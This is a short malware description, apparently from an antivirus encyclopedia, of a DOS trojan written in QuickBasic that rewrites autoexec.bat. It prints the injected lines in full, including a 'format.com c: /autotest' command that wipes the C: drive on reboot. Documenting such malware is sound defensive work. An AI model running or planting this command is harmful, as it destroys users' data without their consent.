Trojan.DOW.Sabil

Technical Details

This Trojan program is a DOS EXE file of 16KB written in QuickBasic. The file is compressed using ExePack and UPX. The size of the decompressed file is approximately 20KB.

On start-up, the program writes the following lines to “c:autoexec.bat”:

@echo Sario Written by Sarosoft
@echo Acireale Luglio 2003
format.com c: /autotest

The C: disk may be reformatted when the computer is re-booted.